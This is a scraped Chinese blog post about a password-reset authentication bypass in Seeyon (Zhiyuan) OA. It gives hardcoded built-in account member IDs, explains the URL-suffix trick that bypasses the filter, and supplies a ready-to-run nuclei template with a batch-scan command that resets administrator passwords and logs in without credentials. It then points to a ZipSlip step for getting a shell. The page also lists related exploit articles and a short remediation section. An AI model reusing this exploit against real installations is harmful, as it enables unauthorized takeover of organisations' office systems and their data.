致远OA_ucpcLogin密码重置_后台可getshell

最新推荐文章于 2024-07-25 13:44:24 发布
最新推荐文章于 2024-07-25 13:44:24 发布
阅读量1.8k 收藏 4
点赞数 5
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39342001/article/details/137350007
版权

 

漏洞概述:

致远中存在一些自带的用户,这些用户的memberid值都是固定的,正常情况下,我们可以通过changePassword方法修改system等用户的密码。

seeyon-guest -6964000252392685202system -7273032013234748168audit-admin -4401606663639775639group-admin 5725175934914479521

该漏洞是对rest接口重置密码漏洞补丁权限的绕过

CTPSecurityFilter.classdoFilter方法中,根据uri的特征,分别有7种权限校验的方法
其中当uri的后缀为.do或者 .do;jessionid=的时候,那么就会进入到SpringControllerAuthenticatorauthenticate方法中进行验证。

而rest接口修改密码的路由为/seeyon/rest/orgMember/-7273032013234748168/password/123456123456为我们需要修改的密码,当把密码写成123456.do或者123456.do;jessionid= ,即可让该请求走SpringControllerAuthenticatorauthenticate方法中进行验证,所以只需要普通用户的权限就可以修改管理员的密码。

但是仍旧需要登录,但是当后缀选择genericController.do或者​share.do接口时,所有的action都不需要登录,这就实现前台修改管理员密码​。

漏洞复现:

nuclei脚本:

 

  

id: zhiyuanOA-ucpclogin-passwordresetinfo:  name: zhiyuanOA-ucpclogin-passwordreset  author: unknow  severity: critical    http:  - raw:      - |+        PUT /seeyon/rest/orgMember/{{memberid}}/password/genericController.do HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=        Connection: close            payloads:      memberid:        - "-6964000252392685202"        - "-7273032013234748168"        - "-4401606663639775639"        - "5725175934914479521"  - raw:      - |+        POST /seeyon/rest/authentication/ucpcLogin?login_username={{name}}&login_password=genericController.do&ticket= HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=        Connection: close            payloads:      name:        - seeyon-guest        - system        - audit-admin        - group-admin    matchers:      - type: word        part: body        words:          - '"LoginOK":"ok"'

批量验证:

nuclei.exe -p http://127.0.0.1:8080 -stats -t wangkang-NS-ASG-list-sqli.yaml -u xxxxxxxxxxxxxxxxxxxx

 

 

 

登录后台后,可利用通过ZipSlip漏洞getshell。需要的​朋友可以去看相关的文章。

https://mp.weixin.qq.com/s/AwXaoIq5kCHScx9NUcgPfQ

https://xz.aliyun.com/t/13741​

qq_39342001
关注
致远OA ucpclogin 任意密码重置
weixin_43567873的博客
03-10 950
致远OA ucpclogin 任意密码重置
【漏洞复现】致远OA ucpclogin 任意密码重置漏洞
qq_67810151的博客
03-07 2284
致远OA 存在密码重置漏洞,未授权的攻击者在知道用户名的情况下,可以构造特制的请求包,从而修改用户密码,登录系统后台
致远OA ucpcLogin密码重置(可组合拳GetShell
holyxp的博客
03-31 4233
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
致远OA管理员密码的重置
致远OA的博客
08-25 1万+
管理员账号忘记了,然后致远OA的运维服务也到期了,怎么办? 求人不如求自己,我们来看看到底怎么修改相关的管理员密码吧。 注意一:更新后需要重启OA应用方可生效。 注意二:更新后的密码是OA系统预设密码。 注意三:如果OA设置了密码等级为中等或以上,在修改后的首次登陆需要强制修改密码 system系统管理员(默认密码:system,对应A8的系统管理员、A6的单位管理员),SQL如下: UPDATE ORG_PRINCIPAL SET CREDENTIAL_VALUE='L0tEW5Yk+c
致远oa系统多版本getshell漏洞(附改版的脚本)
rlenew的博客
11-18 7492
0x01 影响版本: 致远A8-V5协同管理软件 V6.1sp1 致远A8+协同管理软件 V7.0、V7.0sp1、V7.0sp2、V7.0sp3 致远A8+协同管理软件 V7.1 0x02 漏洞利用: 01.通过访问/seeyon/htmlofficeservlet 如果出现下图则可能存在 在通过我更改过的脚本进行检测 确认目标存在可写入漏洞并且访问已写入的文件url,如图 接下来程序会询问是否接着尝试getshell 如果确定会得到exp的利用url python脚本:https://github.
致远getshell
weixin_30412577的博客
06-26 323
1、刚刚4点多爆出来热乎的。 2、目标就不教怎么找了 3、请求报文:       返回:     4、访问webshell    转载于:https://www.cnblogs.com/ritte/p/11091213.html...
致远OA协同管理软件无需登录getshell
如果巅峰留不住,那就重走来时路
08-08 793
一个男子汉,老守在咱村那个土圪崂里,又有什么意思?人就得闯世事!安安稳稳活一辈子,还不如痛痛快快甩打几下就死了!即使受点磨难,只要能多经一些世事,死了也不后悔!
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6047
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
BurpSuite插件(BP插件、Burp插件、武装BP)
墨痕诉清风的博客
03-07 3358
目录 解决光标错位 HAE Domain Hunter Pro passive-scan-client-0.3.0 LinkFinder HTTPHeadModifer 解决光标错位 一般我拿到Burp必做的一件事就是把光标错位调整好: User options-Display-HTTP Message Display 黑体-24px HAE https://github.com/gh0stkey/HaE 此时才把插件导入进来,需要配置你的HAE正则。 公共规..
被攻击的一些重点系统漏洞整理
鱼的博客
08-18 1500
一、OA系统 泛微(Weaver-Ecology-OA) ???? 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0 https://xz.aliyun.com/t/6560 ???? 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) https://zhuanlan.zhihu.com/p/86082614 ???? 泛微ecology OA数据库配置信息泄露 https://www.cnblogs.co
红队攻防文库
如果巅峰留不住,那就重走来时路
08-23 626
各家兴便是天下大同
2021 HW 漏洞清单汇总 ( 附 poc )
热门推荐
gjgj的博客
04-23 1万+
2021 HW 漏洞清单汇总 2021.4.8——4.22 披露时间 涉及商家/产品漏洞描述 2021/04/08启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08禅道项目管理软件11.6禅道 11.6 sql注...
[漏洞合集]致远获取后台权限及权限绕过漏洞大合集
LiangYueSec的博客
07-25 3287
[漏洞合集]致远获取后台权限及权限绕过漏洞大合集
致远OA 组合getshell
weixin_43227251的博客
04-21 5296
致远OA通杀 最新组合getshell 复现版本: 致远A6-V5协同管理软件.A6 V7.1SP1 Getshell 分三步 1.获取cookie信息 2.上传压缩文件 3.解压压缩文件得到shell 1.获取 cookie 漏洞地址 /seeyon/thirdpartyController.do 数据包: POST /seeyon/thirdpartyController.do HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10
2023 致远OA-任意用户密码重置漏洞
weixin_45908624的博客
09-14 3516
致远OA 短信验证码绕过重置密码漏洞
致远OA检测工具-seeyon_exp
SuperherRo的博客
09-21 1713
致远OA综合利用工具
致远OA接口】获取接口凭证token
致远OA的博客
09-09 8116
前言 调用致远OA的rest接口,首先要获取接口的凭证token,如何获取的呢?下面我们一步一步来看看。
致远OA任意管理员登陆漏洞分析
swordheart的博客
07-08 4370
随着中国最大的安全产品性能检测以及人体体能极限挑战活动的到来,各路大佬都八仙过海各显神通。同时大量的0day被公开,排除那些被辟谣的,还有很多值得学习的漏洞。致远这是个组合漏洞,首先任意管理员登陆,然后后台getshell。因为前台漏洞相对来说危害较高,这里着重分析下前台这个漏洞。致远oa使用spring的自动装配,通过在xml文件中搜索漏洞url中的,可以快速定位到漏洞类。 根据exp找到存在问题的方法。 找到该方法后基本上可以一眼看到漏洞点了,在该方法的最下方,这里的memberId是可控的。首先通过
组件安全以及漏洞复现
weixin_58954236的博客
09-08 1654
​ 组件(例如:库、框架和其他软件模块)拥有和应用程序相同的权限。如果应用程序中含有已知漏洞的组件被攻击者利用,可能会造成严重的数据丢失或服务器接管。同时,使用含有已知漏洞的组件的应用程序和API 可能会破坏应用程序防御、造成各种攻击并产生严重影响。
致远oa用户密码重置漏洞
最新发布
02-25
### 致远OA用户密码重置安全漏洞及其修复方法 #### 漏洞概述 致远OA存在一个高危级别的任意用户密码重置漏洞,允许未经授权的攻击者通过构造特定的数据包来触发未授权的密码重置行为。这可能导致攻击者获得合法用户的账户控制权限,并进而实施更严重的攻击活动[^3]。 #### 漏洞影响范围 受影响的产品版本包括但不限于V5/G6 V8.1SP2、V8.2等系列版本。这些版本中存在的缺陷使得它们容易受到上述提到的攻击方式的影响。 #### 修复方案详解 为了有效防范此类攻击的发生,在开发层面应当采取如下措施: - **增强身份验证逻辑** 对于任何涉及更改敏感信息的操作(如修改密码),应该严格检验发起者的身份合法性。具体来说就是确保只有经过认证后的会话才能发送有效的变更请求,并且每次操作都需重新确认一次当前登录状态下的真实意图。此外还需加入额外的身份验证因素,比如短信验证码或邮件令牌等形式作为辅助手段以增加安全性[^2]。 - **优化前端交互设计** 避免直接向浏览器端暴露过多不必要的个人信息字段(例如手机号码、电子邮箱地址)。对于确实必要的提示性文字,则尽可能采用部分隐藏的方式显示给用户查看即可满足业务需求的同时减少潜在风险点的存在概率。 - **引入防暴力破解机制** 设置合理的尝试次数上限以及相应的锁定策略,当检测到来自同一IP地址连续多次失败记录时自动对该源进行短暂封禁处理直至管理员介入审核为止。这样既能够阻止恶意程序批量测试弱口令组合的行为发生又能保障正常用户的正常使用体验不受干扰。 - **改进URL参数加密算法** 使用高强度哈希函数生成唯一性的Token字符串代替原有的简单数值型标识符参与到整个流程当中去。这样一来即使有人截获到了完整的HTTP GET请求也无法轻易解析出其中所携带的具体含义从而达到保护隐私的目的。 ```python import hashlib, time def generate_secure_token(user_id): timestamp = str(int(time.time())) random_salt = 'some_random_string' token_input = f"{user_id}{timestamp}{random_salt}" secure_token = hashlib.sha256(token_input.encode()).hexdigest() return secure_token ``` #### 后续维护建议 官方已经针对这个问题发布了专门的安全补丁文件供客户下载安装使用。强烈推荐各机构尽快安排技术人员依照指导手册完成相应升级工作以免遭受不必要的损失[^1]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值